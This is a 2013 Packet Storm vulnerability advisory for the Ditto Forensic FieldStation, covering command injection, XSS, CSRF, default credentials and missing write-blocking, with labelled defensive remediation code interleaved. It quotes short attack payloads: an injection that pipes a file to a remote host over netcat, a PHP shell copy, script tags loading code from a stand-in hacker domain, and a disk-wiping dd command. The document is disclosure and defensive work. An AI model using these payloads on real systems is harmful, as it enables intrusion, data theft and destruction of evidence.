Packet Storm: PACKETSTORM:124420
Ditto Forensic FieldStation 2013Oct15a XSS / CSRF / Command Execution
Author: Martin Wundram
Published: Dec 13, 2013 (packetstormsecurity.com)

EPSS: 0.039 (percentile 92.2%)

**************************************************************
Title: Ditto Forensic FieldStation, multiple vulnerabilities  
Versions affected: <= 2013Oct15a (all)  
Vendor: CRU Wiebetech  
Discovered by: Martin Wundram  
Email: [email protected]  
Date found: 2013-04-22  
Date published: 2013-12-12  
Status: partially patched  
**************************************************************  
  
  
0] ======== Introduction / Background / Impact ========  
In computer forensics (http://en.wikipedia.org/wiki/Computer_forensics) one
essential requirement is that evidence data is not modified at all (or at
least not unnoticed). Therefore IT forensic experts use write-blockers to
ensure read-only access to evidence data such as hard disks or USB mass
storage.
  
The Ditto Forensic FieldStation is such a piece of special equipment (hardware
with embedded software) used by forensic experts to analyse and copy evidence
data in a safe and secure way. The ditto is explicitly marketed as a device for
acquiring data from network file shares, too. This means it is meant to be
connected to the possibly hostile networks of suspects.

However, it was found to be vulnerable to the point of not being reliable as
a computer forensic device.
  
  
1] ======== OS Command Injection ========  
Class: Command Injection [CWE-77]  
Impact: Code execution  
Remotely Exploitable: Yes  
CVE Name: CVE-2013-6881  
CVSS v2 Base Score: 10  
Overall CVSS v2 Score: 9.2  
CVSS v2 Vector:  
(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)  
  
Several input fields of the web application are vulnerable to OS command
injection. E.g. the application allows parameters like 'sector size' or 'skip
count' to be set for a forensic imaging task. Because of improper
neutralization, combined with the web server running with root privileges, an
attacker is able to access and manipulate the complete system.
  
Example 1 (setting of 'sector size' = 1 with malicious content):  
  
1;cat /opt/web/htdocs/index.php | nc 192.168.1.1 6666;  
  
Example 2 (setting of 'set-size' = 1 with copying a PHP shell from  
the external SD card):  
  
1;cp /ditto/shell.php /opt/web/htdocs;  
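The fix for this class of bug is strict allow-list validation of each numeric parameter plus passing it to the imaging tool as a single argv element instead of a shell string. The following is an added example, not code from the Ditto firmware or its vendor; it assumes the imaging task ends up calling dd (section 7 shows dd is present on the device) and uses hypothetical function and parameter names:

```python
import re
import subprocess
import sys

# Added example (not code from the Ditto firmware or its vendor): how an
# imaging parameter such as 'sector size' reaches a shell command in the
# vulnerable pattern, and how to validate and pass it safely instead.

# Payload from the advisory's Example 1.
INJECTED_SECTOR_SIZE = "1;cat /opt/web/htdocs/index.php | nc 192.168.1.1 6666;"


def build_dd_command_unsafe(sector_size: str, src: str, dst: str) -> str:
    """Vulnerable pattern: untrusted input is concatenated into a command line
    that is later handed to a shell. The ';' in INJECTED_SECTOR_SIZE ends the
    dd command and starts attacker-chosen commands (CWE-77)."""
    return f"dd if={src} of={dst} bs={sector_size}"


def validate_positive_int(value: str, lo: int = 1, hi: int = 1 << 20) -> int:
    """Allow-list validation: plain decimal digits only, then a range check.
    Anything else (letters, ';', '|', spaces, '-') is rejected outright."""
    if not re.fullmatch(r"[0-9]{1,7}", value):
        raise ValueError(f"not a plain decimal integer: {value!r}")
    number = int(value)
    if not lo <= number <= hi:
        raise ValueError(f"out of range [{lo}, {hi}]: {number}")
    return number


def is_valid_int(value: str, lo: int = 1, hi: int = 1 << 20) -> bool:
    """Boolean wrapper around validate_positive_int for callers that only
    need accept/reject."""
    try:
        validate_positive_int(value, lo, hi)
        return True
    except ValueError:
        return False


def build_dd_command_safe(sector_size: str, skip_count: str, src: str, dst: str) -> list:
    """Hardened form: validated integers placed into an argv list. With
    shell=False each element reaches dd as one argument via execve, so shell
    metacharacters have no meaning."""
    bs = validate_positive_int(sector_size)
    skip = validate_positive_int(skip_count, lo=0)
    return ["dd", f"if={src}", f"of={dst}", f"bs={bs}", f"skip={skip}", "conv=noerror,sync"]


def echo_argument(arg: str) -> str:
    """Runs a child process with shell=False and returns what it received as
    argv[1]; shows that ';' and '|' survive as ordinary characters."""
    proc = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", arg],
        shell=False, check=True, capture_output=True, text=True,
    )
    return proc.stdout.rstrip("\n")


if __name__ == "__main__":
    print("unsafe:", build_dd_command_unsafe(INJECTED_SECTOR_SIZE, "/dev/sda", "/mnt/image.dd"))
    print("valid?", is_valid_int(INJECTED_SECTOR_SIZE), is_valid_int("512"))
    print("safe argv:", build_dd_command_safe("512", "0", "/dev/sda", "/mnt/image.dd"))
    print("argv[1] seen by child:", echo_argument(INJECTED_SECTOR_SIZE))
```

Both halves matter: the regex rejects the payload before anything runs, and the argv list means that even a value that slipped past validation would arrive at dd as one literal argument rather than as shell syntax.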
  
  
2] ======== Persistent XSS ========  
Class: Cross-site Scripting [CWE-79]  
Impact: Code execution  
Remotely Exploitable: Yes  
Status: unpatched  
CVE Name: CVE-2013-6882  
CVSS v2 Base Score: 9  
Overall CVSS v2 Score (if patched): 9.2  
CVSS v2 Vector:  
(AV:N/AC:L/Au:N/C:P/I:C/A:P/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)  
Overall CVSS v2 Score (unpatched): 10  
  
The web application suffers from multiple XSS vulnerabilities. The first one
(a) is critical because an attacker without any authentication is able to push
malicious code into the system and consequently attack every user. The other
ones (b) require authentication first.
  
a) The web application logs every login (including the username) unsanitized
to a system log. Additionally, the web application embeds that system log,
rendered as HTML, into the start page of every user who successfully logs in.
Thus an unprivileged attacker can persistently inject malicious code which
attacks all users of the vulnerable system immediately after they log in.
  
Example:  
  
POSTDATA=  
user=demo%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E  
&pass=demo&login=Log+In  
  
  
b) It is easy to submit malicious data into multiple HTML form fields (e.g.
one can force the system to load externally hosted JavaScript code with
<script src=http://www.hacker.tld/code.js></script>). This can result in
dangerous situations where the (external) JavaScript code mangles the
information displayed about important computer forensic key values whose
integrity is crucial.
  
Example:
a 784 petabyte (PB) source disk displayed instead of 32 GB, investigator
"Al Capone", "verify actions: yes" instead of "no", ...
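Both findings share one root cause: untrusted strings (the username in the log for (a), arbitrary form fields for (b)) are placed into HTML without output encoding. The following added example is not the Ditto web application's code; it decodes the POSTDATA from the advisory, shows the logging and rendering pattern that makes the injection persistent, and the two fixes (sanitize what goes into the log, escape everything at the HTML sink). The character policy for usernames and the CSP header value are assumptions:

```python
import html
import re
import urllib.parse

# Added example (not the Ditto web application's own code): the login request
# from the advisory, the logging and rendering pattern that makes it persistent
# XSS, and the sanitizing/escaping fixes.

# The POSTDATA from the advisory, exactly as a browser URL-encodes it.
POSTDATA = "user=demo%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&pass=demo&login=Log+In"

# Sample payload from finding (b): a form field loading an external script.
EXTERNAL_SCRIPT = '<script src=http://www.hacker.tld/code.js></script>'


def parse_login(postdata: str) -> dict:
    """Decodes the form body; '+' becomes ' ' and %xx sequences are decoded."""
    return dict(urllib.parse.parse_qsl(postdata, keep_blank_values=True))


def log_login_unsafe(log: list, username: str, ok: bool) -> None:
    """Vulnerable pattern (a): the raw username is written to the system log."""
    log.append(f"login {'ok' if ok else 'FAILED'} user={username}")


def sanitize_for_log(username: str, max_len: int = 32) -> str:
    """Keeps only a conservative character class and caps the length, so neither
    markup nor control characters reach the log file. (Assumed policy; the
    device's real username rules may differ.)"""
    cleaned = re.sub(r"[^A-Za-z0-9_.@-]", "", username)
    return cleaned[:max_len] or "(invalid)"


def log_login_safe(log: list, username: str, ok: bool) -> None:
    """Hardened logging: the log never contains raw user input."""
    log.append(f"login {'ok' if ok else 'FAILED'} user={sanitize_for_log(username)}")


def render_log_unsafe(log: list) -> str:
    """Vulnerable sink: log lines are embedded into the start page verbatim."""
    return "<ul>" + "".join(f"<li>{line}</li>" for line in log) + "</ul>"


def render_log_safe(log: list) -> str:
    """Output encoding at the HTML sink. Escaping every untrusted value where it
    is placed into HTML is the fix that covers finding (b) as well."""
    return "<ul>" + "".join(f"<li>{html.escape(line, quote=True)}</li>" for line in log) + "</ul>"


def render_field_safe(value: str) -> str:
    """Same escaping applied to any form field echoed back into a page."""
    return html.escape(value, quote=True)


def contains_script_tag(rendered: str) -> bool:
    """Crude check used only to illustrate the difference between the two
    sinks; it is not a general XSS detector."""
    return re.search(r"<\s*script\b", rendered, re.IGNORECASE) is not None


# Defence in depth for (b): a CSP that forbids scripts from other origins and
# inline scripts (constructed header value; tune it to the real application).
SECURITY_HEADERS = {
    "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
    "X-Content-Type-Options": "nosniff",
}
```

Sanitizing the log entry alone is not enough, because other code paths write to the same page; escaping at the sink is the change that closes both (a) and (b), and the CSP limits the damage if an escape is ever missed.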
  
  
3] ======== Cross-Site Request Forgery ========  
Class: Cross-Site Request Forgery [CWE-352]  
Impact: Application misuse  
Remotely Exploitable: Yes  
CVE Name: CVE-2013-6883  
CVSS v2 Base Score: 6.6  
Overall CVSS v2 Score: 8  
CVSS v2 Vector:  
(AV:N/AC:H/Au:N/C:P/I:C/A:P/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)  
  
The web application is vulnerable to Cross-Site Request Forgery. E.g. the disk
erase technique (the correct setting is important for the reliable deletion of
sensitive forensic data) can be changed with a simple forged POST request.
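The standard defence is a synchronizer token bound to the session, checked on every state-changing request, with the browser's Origin header as a second check. The following is an added example and not the Ditto web application's code; the handler, the erase-method names, the device address and the per-device key are assumptions:

```python
import hashlib
import hmac
import secrets

# Added example (not the Ditto web application's own code): protecting the
# state-changing "disk erase technique" POST with a synchronizer token and an
# Origin check. The option names, device address and key are assumptions.

# Per-device secret generated at boot; assumed to live outside the web root.
SERVER_KEY = secrets.token_bytes(32)

# Constructed option names; the real device's erase settings may differ.
ALLOWED_ERASE_METHODS = {"zero-fill", "random-3pass"}
EXPECTED_ORIGIN = "https://ditto.local"  # assumed device address


def issue_csrf_token(session_id: str) -> str:
    """Token bound to the session via HMAC; embedded as a hidden form field
    in the settings page served to that session."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf_token(session_id: str, token) -> bool:
    """Constant-time comparison; a missing or foreign token fails."""
    expected = issue_csrf_token(session_id)
    return isinstance(token, str) and hmac.compare_digest(expected, token)


def update_erase_settings_unsafe(session: dict, form: dict) -> int:
    """Vulnerable pattern: a valid session cookie is all it takes, so a
    cross-site POST (CWE-352) silently changes the erase method."""
    session["erase_method"] = form.get("erase_method")
    return 200


def update_erase_settings_safe(session: dict, form: dict, origin) -> int:
    """Hardened handler; returns the HTTP status code it would send."""
    if not verify_csrf_token(session["id"], form.get("csrf_token")):
        return 403
    # Browsers attach Origin to cross-site POSTs; reject when present and foreign.
    if origin is not None and origin != EXPECTED_ORIGIN:
        return 403
    method = form.get("erase_method")
    if method not in ALLOWED_ERASE_METHODS:
        return 400
    session["erase_method"] = method
    return 200
```

The token only helps if it cannot be read cross-origin, which the XSS findings above would defeat; marking the session cookie SameSite and fixing the XSS are part of the same change set.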
  
  
4] ======== Misconfigured Daemon Rights ========  
Class: Configuration [CWE-16]  
Impact: Full system access  
  
The web server lighttpd and the PHP engine run as user 'root'. Thus injection
weaknesses in the 'ditto' web application result in immediate full system
access.
  
  
5] ======== Unneeded Daemons/Software ========  
Class: Configuration [CWE-16]  
Impact: Attackable services  
Best matching CCE-ID: CCE-4268-9  
  
Forensic usage needs only write-blocking and imaging of evidence data.
However, the base system contains further active software and services, which
helps an attacker compromise the system and escalate privileges. The
tools/daemons in question are especially netcat and an active SSHd.
Furthermore, the SSHd binds to the network port labeled 'source', which is
intended for use in supposedly hostile network environments: the network
containing evidence data from suspects.
  
  
6] ======== Use of standard credentials ========  
Class: Use of Hard-coded Credentials [CWE-798]  
Impact: unwanted full system access  
Remotely Exploitable: Yes  
CVE Name: CVE-2013-6884  
CVSS v2 Base Score: 10  
Overall CVSS v2 Score: 9.2  
CVSS v2 Vector:  
(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)  
  
The ditto write-blocker contains a default system user named 'ditto' with the
default password 'ditto', which is allowed to elevate its rights to root (sudo)
without further authentication. In combination with the active SSHd, this
vulnerability gives attackers full access to the ditto if it is connected to
the same network or to one reachable from theirs.
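Findings 4, 5 and 6 are all configuration state that an examiner can audit offline before trusting a device. The following added example (not the vendor's code) runs three checks over constructed sample data imitating a process listing, a listening-socket listing and /etc/sudoers, once for the state the advisory describes and once for a hardened configuration. The sample formats are simplified; the parsers would need adapting to the device's actual tools:

```python
import re

# Added example (not the vendor's code): offline audit of the configuration
# weaknesses from findings 4, 5 and 6, run over constructed sample data that
# loosely imitates `ps -eo user,comm` output, a listening-socket listing and
# /etc/sudoers. The parsers match these simplified formats only.

WEB_DAEMONS = {"lighttpd", "php-cgi", "php-fpm"}
UNNEEDED_SERVICES = {"sshd", "telnetd"}
UNNEEDED_TOOLS = {"nc", "netcat", "ncat"}

# Constructed sample: the state the advisory describes.
PS_VULNERABLE = """USER     COMMAND
root     init
root     lighttpd
root     php-cgi
root     sshd
ditto    sh
"""
LISTEN_VULNERABLE = """0.0.0.0:22 sshd
0.0.0.0:80 lighttpd
"""
SUDOERS_VULNERABLE = """root  ALL=(ALL) ALL
ditto ALL=(ALL) NOPASSWD: ALL
"""
BINARIES_VULNERABLE = ["/bin/dd", "/usr/bin/nc", "/usr/sbin/sshd", "/usr/sbin/lighttpd"]

# Constructed sample: a hardened configuration (unprivileged web user, no
# SSHd, no netcat, no passwordless sudo, web UI bound to the admin side only).
PS_HARDENED = """USER     COMMAND
root     init
www-data lighttpd
www-data php-cgi
"""
LISTEN_HARDENED = """192.168.10.1:443 lighttpd
"""
SUDOERS_HARDENED = """root ALL=(ALL) ALL
"""
BINARIES_HARDENED = ["/bin/dd", "/usr/sbin/lighttpd"]


def audit_process_owners(ps_output: str) -> list:
    """Finding 4: web server / PHP engine running as root."""
    findings = []
    for line in ps_output.splitlines()[1:]:  # skip the header line
        parts = line.split()
        if len(parts) < 2:
            continue
        user, comm = parts[0], parts[1]
        if comm in WEB_DAEMONS and user == "root":
            findings.append(f"{comm} runs as root")
    return findings


def audit_services(listen_output: str, binaries: list) -> list:
    """Finding 5: unneeded daemons listening (a wildcard bind includes the
    'source' port) and unneeded tools present on the system."""
    findings = []
    for line in listen_output.splitlines():
        m = re.match(r"(\S+):(\d+)\s+(\S+)", line)
        if not m:
            continue
        addr, port, proc = m.group(1), int(m.group(2)), m.group(3)
        if proc in UNNEEDED_SERVICES:
            where = "all interfaces (including the source port)" if addr in ("0.0.0.0", "::", "*") else addr
            findings.append(f"{proc} listening on {where}:{port}")
    for path in binaries:
        if path.rsplit("/", 1)[-1] in UNNEEDED_TOOLS:
            findings.append(f"unneeded tool present: {path}")
    return findings


def audit_sudoers(sudoers: str) -> list:
    """Finding 6: passwordless privilege elevation for a non-root account."""
    findings = []
    for line in sudoers.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments
        if not line or line.startswith("Defaults"):
            continue
        who = line.split()[0]
        if "NOPASSWD" in line and who != "root":
            findings.append(f"sudoers: {who} may elevate to root without a password")
    return findings


def audit(ps_output: str, listen_output: str, binaries: list, sudoers: str) -> list:
    """All three checks combined; an empty list means nothing was flagged."""
    return (audit_process_owners(ps_output)
            + audit_services(listen_output, binaries)
            + audit_sudoers(sudoers))
```

The default 'ditto'/'ditto' password itself cannot be confirmed from configuration files alone; the sudoers check catches the part of finding 6 that turns that account into root, and the remaining step is to verify that the account's password has been changed or the account removed.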
  
  
7] ======== Misconfigured Core System ========  
Class: Configuration [CWE-16]  
Impact: Alteration of evidence data  
Remotely Exploitable: Yes  
  
Although explicitly marketed as a hardware write-blocker, the ditto does not
implement any specific write-blocking mechanism at all. The underlying system
is able to manipulate or even erase evidence on devices connected to the
'source side' of the ditto. The problem: no hardware-level, driver-level or
kernel-level (blockdev) write-blocking is implemented. Only the web application
prevents the user from writing to the source media, which is just security by
obscurity. Consequently, every critical weakness or simple malfunction in the
web application can potentially lead to the overwriting of source/evidence
data.

Furthermore, the embedded Linux system mounts its own system partition
writable. Thus malware could be persistently deployed!
  
Example:
One can simply overwrite supposedly write-protected source data (USB stick and
SATA disk) with
dd if=/dev/zero of=/dev/sda
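Because nothing below the web application enforces read-only access, an examiner needs an out-of-band check that the source was not touched during acquisition: hash the source before, hash the image, and hash the source again afterwards. The following added example (not the vendor's code) does this on byte buffers standing in for block devices and simulates a faulty acquisition that writes one byte into the source, which is the failure mode the advisory warns about. The block size and the sample data are constructed:

```python
import hashlib

# Added example (not the vendor's code): an out-of-band integrity check around
# an acquisition. Byte buffers stand in for block devices; on a real system the
# same hashing is applied to the device nodes. The faulty acquisition simulates
# a write reaching the source because no layer below the web UI blocks it.

BLOCK_SIZE = 512  # constructed; use the device's real sector size


def block_hashes(data: bytes, block_size: int = BLOCK_SIZE) -> list:
    """Per-block SHA-256 digests, so a change can be located, not just detected."""
    return [hashlib.sha256(data[i:i + block_size]).hexdigest()
            for i in range(0, len(data), block_size)]


def overall_hash(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def snapshot(data: bytes) -> dict:
    """Hashes recorded before the source is connected to the acquisition."""
    return {"sha256": overall_hash(data), "blocks": block_hashes(data), "size": len(data)}


def first_changed_offset(before: dict, data: bytes) -> int:
    """Returns -1 if the data still matches the snapshot, otherwise the byte
    offset of the first differing block (or the smaller size if the size changed)."""
    if before["size"] != len(data):
        return min(before["size"], len(data))
    for index, (old, new) in enumerate(zip(before["blocks"], block_hashes(data))):
        if old != new:
            return index * BLOCK_SIZE
    return -1


def simulated_acquisition(source: bytearray, faulty: bool) -> bytes:
    """Copies the source to an image. With faulty=True the acquisition also
    flips one byte inside the source, as a malfunctioning or subverted
    application could on a device without kernel-level write blocking."""
    image = bytes(source)
    if faulty:
        source[3 * BLOCK_SIZE + 7] ^= 0xFF
    return image


def verify_acquisition(source: bytearray, faulty: bool) -> dict:
    """Runs the full before/image/after comparison and reports both results."""
    before = snapshot(bytes(source))
    image = simulated_acquisition(source, faulty)
    return {
        "image_matches_source_before": overall_hash(image) == before["sha256"],
        "source_changed_at": first_changed_offset(before, bytes(source)),
    }


def make_sample_source(blocks: int = 8) -> bytearray:
    """Constructed sample 'evidence'; deterministic so results are reproducible."""
    return bytearray((i * 31 + 7) % 256 for i in range(blocks * BLOCK_SIZE))
```

The faulty run is the instructive one: the image hash still matches the pre-acquisition source hash, so verifying the image alone would report success while the evidence itself was altered at offset 1536. Re-hashing the source afterwards is what catches it. The kernel-level measure the advisory says is missing is the blockdev read-only flag (`blockdev --setro` on the source device node), which would make that write fail instead of merely being detected.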
  
  
8] ======== Solution ========  
Upgrade your ditto to the newest available firmware (2013Oct15a). Don't
connect the device to potentially hostile networks. Examine your device for
earlier manipulation (has someone placed a backdoor in the embedded Linux, or
malware which silently manipulates evidence data or copies of evidence data?).
  
  
9] ======== Report Timeline ========  
2013-04-22 Discovery of vulnerabilities
2013-04-23 First contact with vendor, including agreement about later public disclosure
2013-04-26 Detailed information about vulnerabilities provided to vendor
2013-06-30 Vendor fixes some vulnerabilities with firmware 2013Jun30a
2013-10-15 Vendor fixes some vulnerabilities with firmware 2013Oct15a
2013-11-26 Details of the upcoming public disclosure provided to vendor. Vendor gave feedback regarding the technical accuracy of this report
2013-12-12 Public disclosure
  
  
10] ======== Discussion ========  
Because integrity is of utmost importance during the forensic process (correct  
handling of evidence data and correct deduction of conclusions and  
implications), even small vulnerabilities in forensic tools and devices become  
critical.  
  
  
11] ======== References ========  
a) http://www.cru-inc.com/support/software-downloads/ditto-firmware-updates/ditto-firmware-release-notes-2013oct15a/
b) http://www.cru-inc.com/support/software-downloads/ditto-firmware-updates/ditto-firmware-release-notes-2013jun30a/
  
  
--
Diplom-Wirtschaftsinformatiker Martin G. Wundram

DigiTrace GmbH - Expertise in IT Forensics
Managing directors: Alexander Sigel, Martin Wundram
Register court Cologne, HR B 72919
VAT ID: DE278529699

Zollstockgürtel 59, 50969 Köln
Phone: 0221-6 77 86 95-0
Website: www.DigiTrace.de
E-Mail: [email protected]
  
  